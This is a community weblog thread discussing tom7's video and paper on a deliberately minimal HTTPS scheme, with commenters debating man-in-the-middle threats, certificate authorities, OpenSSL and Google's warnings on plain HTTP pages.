__ __ _ _____ _ _ _
| \/ | ___| |_ __ _| ___(_) | |_ ___ _ __
| |\/| |/ _ \ __/ _` | |_ | | | __/ _ \ '__|
| | | | __/ || (_| | _| | | | || __/ |
|_| |_|\___|\__\__,_|_| |_|_|\__\___|_|
community weblog
a pre-paid self-own
tom7/suckerpinch tweaks HTTPS to add minimal security to a website that doesn't need security. Youtube, 35 minutes. tom7 previously
posted by fantabulous timewaster on Apr 15, 2026 at 9:38 PM
---------------------------
I was considering posting this myself, but you saved me the trouble! It's great as tom7's papers and videos tend to be.
posted by JHarris at 12:18 AM
---------------------------
...or PDF: https://tom7.org/httpv/httpv.pdf
I read the PDF yesterday, it's cute and untroubled by the theatrical aspects of online security.
posted by k3ninho at 3:23 AM
---------------------------
I'm not onboard with his idea of toxic max security, because I don't think it's actually that exclusionary on the modern web. But quietly breaking curl is interesting. I wonder if that would be a more effective way that robots.txt to prevent your site from being sucked up into LLM training data.
posted by postcommunism at 5:45 AM
---------------------------
The point where I got hooked on this video is when he said "it's a little weird that my CAD mouse can sign certificates for my bank website"
posted by mcstayinskool at 5:57 AM
---------------------------
m o r e e n g a g e m e n t
posted by bitslayer at 7:03 AM
---------------------------
It's cute, but the "but MY web site doesn't accept any private info/is totally public/etc!" argument falls down if you assume a man-in-the-middle (MITM) attacker: with plain HTTP, that attacker can happily modify the site content (as delivered to an end user) to, e.g., request your credit card number. A visitor then thinks "oh, yeah, I want some Tom7 merch, let me just hand over my credit card details" even if the original site had no "hand over your credit card" page.
Yes, thwarting that attack only requires signing, not encryption, but you still have to have a certificate attesting that your signature is actually yours, which requires the whole certificate authority infrastructure which he rails against (and which, to be fair, has numerous problems) and neither the average user nor the median software developer knows enough to know when signing is sufficient vs full end-to-end encryption.
(And Chrome and Firefox developers have learned that trying to train users to look for the padlock before entering their banking password is pretty much futile — anything that requires even the slightest vigilance from users fails pretty often. The solution is to just require HTTPS everywhere, which at least eliminates one attack vector and means that there is no padlock to ignore.)
(OpenSSL is a pile of hot garbage and has far, far too large of an attack surface, so he's right on that. BoringSSL is better, but still inherits a lot of OpenSSL's code. One day, maybe, we'll end up with digital infrastructure that isn't 70 layers of cruft accreted over decades, but that day isn't coming soon.)
(Also: before the age of generative AI I might have accepted "my site is so niche and low-traffic that no one is going to bother to MITM inject a store page," but now that it's extremely cheap to ask your favorite LLM to write a little merch page and fake a checkout screen, that attack becomes easy enough to do in bulk. Plus, non-security developers are notoriously awful at doing these kinds of threat analyses.)
posted by reventlov at 8:18 AM
---------------------------
It's really easy to check for security when you're submitting or displaying a form. You want to require SSL when someone is doing an interaction that uses POST or GET parameters? Fine. You tell the user about that. A simple URL request? Ugh. Look, you want to see a real attack? Here's an example: Google "foldimate". You'll see a couple of links above the fold. (This is a less fun demo than it used to be, because at least one of the domains has expired, but the other one works.) It's a valid HTTPS link, with a valid ecommerce backend that will take your money and sell you nothing, because the company shut down half a decade ago and never shipped a product. There's no way to really report links anymore, so Google won't fix obvious scams like this, enabled entirely by their flagship product.
That's an actual threat. The scare warnings on HTTP pages are concern trolling from a company that wants to add more barriers to your ability to publish information without going through a gatekeeper.
posted by phooky at 9:22 AM
---------------------------
You want to require SSL when someone is doing an interaction that uses POST or GET parameters? Fine. You tell the user about that.
So now the MITM attacker has a very minor speed bump in that they have to either 3XX redirect you to a domain they control or add a "Merch!" link to a domain they control.
You are correct that there are many other ways to trick a user into handing over their card info; that doesn't mean we shouldn't plug this one.
Also: Google is better off with a more open web with fewer gatekeepers; driving people to put their pages on walled gardens is pretty terrible for Search, which is, IIRC, still the #2 cash cow for Google, and not good for AdSense, which is (again, IIRC) #1. This isn't the same situation as the garbage they're trying to pull with disabling sideloading on Android, where they have multiple very strong financial incentives to close things off, or even the Manifest v3 change that made ad blockers less effective.
posted by reventlov at 10:40 AM
---------------------------
Fair enough; as rare as actual MITM attacks are this does help reduce them. The associated PDF does a pretty good job at explaining why anyone who can MITM you is pretty likely to pwn you anyway, though.
There is a huge gulf between what Google is better off with and what Google actually does. We used to joke that Google could do whatever the hell they wanted without consequence as long as they didn't fuck up search, and then they fucked up search. Like so many other big tech companies, they are juggernauts of pure inertia, techbro continental drift, colliding in slow motion, causing earthquakes and volcanic eruptions and just generally fucking up everybody's day.
posted by phooky at 12:16 PM
---------------------------
If you want an example of how far inertia can take a tech company, or whatever a tech company morphs into, consider that we still all know what Yahoo is, or was, it's not a word that has decayed into meaninglessness to us.
posted by JHarris at 1:01 PM
---------------------------
The associated PDF does a pretty good job at explaining why anyone who can MITM you is pretty likely to pwn you anyway, though.
That's still thinking about "how does someone compromise my site," which is not the only threat model: practical MITM attacks, IIRC, are almost always out at the browser-facing edges of the network: malicious hotspots, compromised consumer routers, etc. None of those will get you a Let's Encrypt cert or do much of anything to the server whose domain you're intercepting, but they will let you sniff or alter any unencrypted traffic for any user behind the compromised device.
posted by reventlov at 7:29 AM
---------------------------